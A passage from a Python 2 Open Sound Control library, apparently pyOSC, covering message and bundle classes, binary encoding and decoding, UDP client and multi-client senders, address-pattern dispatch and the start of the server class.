Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == types.DictType:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in types.StringTypes:
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0L, 1L)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print "Error: too few bytes for int", data, len(data)
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print "Error: too few bytes for float", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print "Error: too few bytes for double", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print "byte 0 1 2 3 4 5 6 7 8 9 A B C D E F"
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print "%s: %s" % (line, repr(bytes[i-15:i+1]))
line = ""
bytes_left = num % 16
if bytes_left:
print "%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:]))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == types.TupleType:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == types.IntType:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in types.StringTypes and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = cmp(self.socket._sock, other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return cmp(self.server, other.server)
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error, e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in types.StringTypes:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in types.StringTypes:
(_, filters) = parseFilterStr(filters)
elif type(filters) != types.DictType:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
elif (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
